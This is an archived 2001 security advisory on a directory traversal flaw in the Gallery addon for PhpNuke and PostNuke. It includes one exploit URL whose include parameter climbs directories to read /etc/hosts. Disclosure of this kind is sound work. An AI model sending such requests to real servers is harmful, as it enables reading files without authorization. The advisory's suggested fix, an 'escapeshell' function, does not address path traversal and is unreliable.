TUCoPS :: Web :: PHP :: web4864.htm



PhpNuke - Gallery Addon for PhpNuke, remote file access
20th Nov 2001 [SBWID-4864]
COMMAND
	Gallery Addon for PhpNuke, remote file access
SYSTEMS AFFECTED
	??
PROBLEM
	Aurélien Cabezon [http://www.iSecureLabs.com] found:
	
	
	[1] Description
	
	Gallery is an intuitive web based photo gallery with authenticated
	users and privileged albums. Photo management includes automatic
	thumbnails, resizing, rotation, etc. Gallery is available as a Nuke 5.0
	module.
	
	Gallery Addon is vulnerable to a ../.. (directory traversal) bug that allows
	arbitrary files on the web server to be read, with the privileges of the
	user the web server runs as.
	
	[2] Exploit
	 
	http://www.somehost.com/modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../etc/hosts
	
	
	 update
	 ======
	 
	 PostNuke 0.6.4 is also vulnerable.
	
SOLUTION
	The coder has been alerted [http://www.menalto.com/projects/gallery-nuke/].
	An easy way to fix such a vulnerability is to use PHP's built-in
	"escapeshell" function.

